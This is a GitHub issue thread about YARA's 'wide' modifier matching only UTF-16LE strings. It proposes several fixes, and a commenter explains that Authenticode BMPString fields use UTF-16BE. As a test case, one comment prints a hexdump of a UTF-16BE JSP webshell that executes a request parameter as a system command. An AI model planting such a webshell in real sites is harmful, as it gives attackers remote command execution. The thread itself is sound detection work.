yara
wide strings match only UTF16-LE
Describe the bug
The example string "Borland" from https://yara.readthedocs.io/en/v4.2.3/writingrules.html#wide-character-strings is encoded there as B\x00o\x00r\x00l\x00a\x00n\x00d\x00,
but that's just the LE version of UTF16. The BE version would be \x00B\x00o\x00r\x00l\x00a\x00n\x00d
(with the \x00 in front). So the example rule from the docs doesn't match UTF16-BE:
rule WideCharTextExample1
{
    strings:
        $wide_string = "Borland" wide
    condition:
        $wide_string
}
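As a quick illustration, the two byte orders can be compared with Python's standard codecs. This sketch assumes that, for plain ASCII text, `wide` produces the same bytes as UTF-16LE, which is what the docs' example shows.

```python
# Encode the docs' example string in both UTF-16 byte orders (no BOM).
word = "Borland"

le = word.encode("utf-16-le")  # same bytes as the docs' `wide` example
be = word.encode("utf-16-be")  # big-endian form: the null byte comes first

print(le)  # b'B\x00o\x00r\x00l\x00a\x00n\x00d\x00'
print(be)  # b'\x00B\x00o\x00r\x00l\x00a\x00n\x00d'
print(le == be)  # False: the null bytes sit on opposite sides of each character
```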
UTF16-LE is by far the most common case, but I stumbled upon the string "Qi Lijun" encoded in UTF16-BE in sample
2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b
(however that happened...).
(Strictly speaking, this is more unexpected behavior than a bug, but the bug template fits better than a feature request.)
To Reproduce
rule WideCharTextExample1
{
    strings:
        $wide_string = "Qi Lijun" wide
    condition:
        $wide_string
}
Doesn't match:
$ yara test.yar 2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b
Expected behavior
There would be several options to handle the problem:
- Back to the Borland example, the perfect solution would be to search for both UTF16-LE and UTF16-BE:
  UTF16-LE: B\x00o\x00r\x00l\x00a\x00n\x00d\x00
  UTF16-BE: \x00B\x00o\x00r\x00l\x00a\x00n\x00d
- The faster, more memory-efficient option would be to strip the trailing \x00 from the pattern the existing implementation searches for, i.e. search for:
  B\x00o\x00r\x00l\x00a\x00n\x00d
  That might produce false positives on very short strings (which shouldn't be used that often anyway, because of the performance and false-positive problems they cause).
- Introduce a new string modifier, e.g. widebe, similar to uint16be.
- Explain the issue in the docs and recommend using hex strings for UTF16-BE.
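The first two options can be sketched in Python to show why the trimmed pattern covers both byte orders. `wide_patterns` is a hypothetical helper, and the trimming trick assumes ASCII text, where every high byte is \x00.

```python
def wide_patterns(text: str) -> dict:
    """Build the byte patterns from the options above (ASCII text assumed)."""
    le = text.encode("utf-16-le")
    be = text.encode("utf-16-be")
    return {
        "le": le,            # what `wide` searches for today
        "be": be,            # option 1 would search for this as well
        "trimmed": le[:-1],  # option 2: LE pattern without the trailing \x00
    }


p = wide_patterns("Borland")
print(p["trimmed"])             # b'B\x00o\x00r\x00l\x00a\x00n\x00d'
print(p["trimmed"] in p["le"])  # True: prefix of the LE encoding
print(p["trimmed"] in p["be"])  # True: suffix of the BE encoding
print(p["le"] in p["be"])       # False: today's pattern misses BE
```

The trimmed pattern is one byte shorter and no longer requires a null after the last character, which is where the false-positive concern for very short strings comes from.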
Please complete the following information:
- OS: Linux
- YARA version: 4.3.0
Additional context
This also affects string search on VirusTotal (VT). This search doesn't return any results: content:"Qi Lijun" tag:peexe
This one returns 10 hits: content:{00 51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
(the same string as hex-encoded UTF16-BE).
To be more precise: this isn't a problem if the string to be matched is in the middle of a UTF16 file, because there are null bytes all around it. It's only a problem when matching at a transition from a multi-byte to a single-byte charset (as in the example above) or at the end of the file.
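A minimal Python sketch of this point, using made-up buffers rather than the sample: the UTF-16LE pattern for `%>` is found inside UTF-16BE text only when another null byte follows the last character.

```python
needle_le = "%>".encode("utf-16-le")  # b'%\x00>\x00', the `wide` pattern

# Hypothetical UTF-16BE buffers:
middle = "a %> b".encode("utf-16-be")               # more UTF-16BE text follows
at_end = "a %>".encode("utf-16-be")                 # "%>" is the last character
transition = "a %>".encode("utf-16-be") + b"xyz"    # single-byte data follows

for name, buf in [("middle", middle), ("at_end", at_end), ("transition", transition)]:
    print(name, needle_le in buf)
# prints: middle True / at_end False / transition False
```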
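For example, this string:
$endtag = "%>" ascii wide
... wouldn't match the closing %> at the end of the UTF-16BE-encoded webshell below, because it only searches for 25 00 3e 00 and 25 3e (the latter only occurs once, in the single-byte page directive at offset 0x28).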
$ hexdump -C UTF-16BE.jsp
00000000 3c 25 40 20 70 61 67 65 20 63 6f 6e 74 65 6e 74 |<%@ page content|
00000010 54 79 70 65 3d 22 63 68 61 72 73 65 74 3d 55 54 |Type="charset=UT|
00000020 46 2d 31 36 42 45 22 20 25 3e 00 3c 00 25 00 52 |F-16BE" %>.<.%.R|
00000030 00 75 00 6e 00 74 00 69 00 6d 00 65 00 2e 00 67 |.u.n.t.i.m.e...g|
00000040 00 65 00 74 00 52 00 75 00 6e 00 74 00 69 00 6d |.e.t.R.u.n.t.i.m|
00000050 00 65 00 28 00 29 00 2e 00 65 00 78 00 65 00 63 |.e.(.)...e.x.e.c|
00000060 00 28 00 72 00 65 00 71 00 75 00 65 00 73 00 74 |.(.r.e.q.u.e.s.t|
00000070 00 2e 00 67 00 65 00 74 00 50 00 61 00 72 00 61 |...g.e.t.P.a.r.a|
00000080 00 6d 00 65 00 74 00 65 00 72 00 28 00 22 00 69 |.m.e.t.e.r.(.".i|
00000090 00 22 00 29 00 29 00 3b 00 25 00 3e |.".).).;.%.>|
So the problem is rather low priority.
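To double-check which patterns occur in the webshell, the file can be rebuilt from the hexdump and searched in Python. This is a sketch: the header and body strings are read off the ASCII column of the dump, and `offsets` is a hypothetical helper, not part of YARA.

```python
header = '<%@ page contentType="charset=UTF-16BE" %>'                # single-byte part
body = '<%Runtime.getRuntime().exec(request.getParameter("i"));%>'   # UTF-16BE part
data = header.encode("ascii") + body.encode("utf-16-be")


def offsets(buf: bytes, pattern: bytes) -> list:
    """Return every (possibly overlapping) start offset of pattern in buf."""
    found, start = [], buf.find(pattern)
    while start != -1:
        found.append(start)
        start = buf.find(pattern, start + 1)
    return found


print(len(data))                      # 156 (0x9c), same size as the dump
print(offsets(data, b"%>"))           # [40]: the ASCII "%>" at 0x28
print(offsets(data, b"%\x00>\x00"))   # []: the `wide` pattern never occurs
print(offsets(data, b"\x00%\x00>"))   # [152]: the UTF-16BE closing tag at 0x98
```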
I'd like to +1 this issue.
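The string you're running into here is the programName value within the SpcSpOpusInfo details of the Authenticode signature. programName is an SpcString, whose Unicode variant is an ASN.1 BMPString, and BMPString is encoded as big-endian two-byte characters, which explains the UTF-16BE bytes.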
We have blogged about this in "I Solemnly Swear My Driver Is Up to No Good". Right now we have to encode the string as UTF-16BE and then as hex before adding it to YARA rules. Adding a utf16be modifier would make rules much easier to read and to write.
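Until a modifier like `widebe`/`utf16be` exists (both names are only proposals in this thread), the manual UTF-16BE + hex workaround can be scripted. A small Python sketch; `utf16be_hex`, `utf16be_rule` and the rule name are hypothetical, chosen for illustration.

```python
def utf16be_hex(text: str) -> str:
    """Encode text as UTF-16BE and format it as a YARA hex string."""
    encoded = text.encode("utf-16-be")
    return "{ " + " ".join(f"{b:02X}" for b in encoded) + " }"


def utf16be_rule(name: str, text: str) -> str:
    """Wrap the hex string in a minimal rule; the rule name is up to the caller."""
    return (
        f"rule {name}\n"
        "{\n"
        "    strings:\n"
        f"        $s = {utf16be_hex(text)}\n"
        "    condition:\n"
        "        $s\n"
        "}\n"
    )


print(utf16be_hex("Qi Lijun"))
# { 00 51 00 69 00 20 00 4C 00 69 00 6A 00 75 00 6E }
print(utf16be_rule("QiLijun_UTF16BE", "Qi Lijun"))
```

The bytes are the same as in the VT hex search above, just in the uppercase style used by the YARA docs.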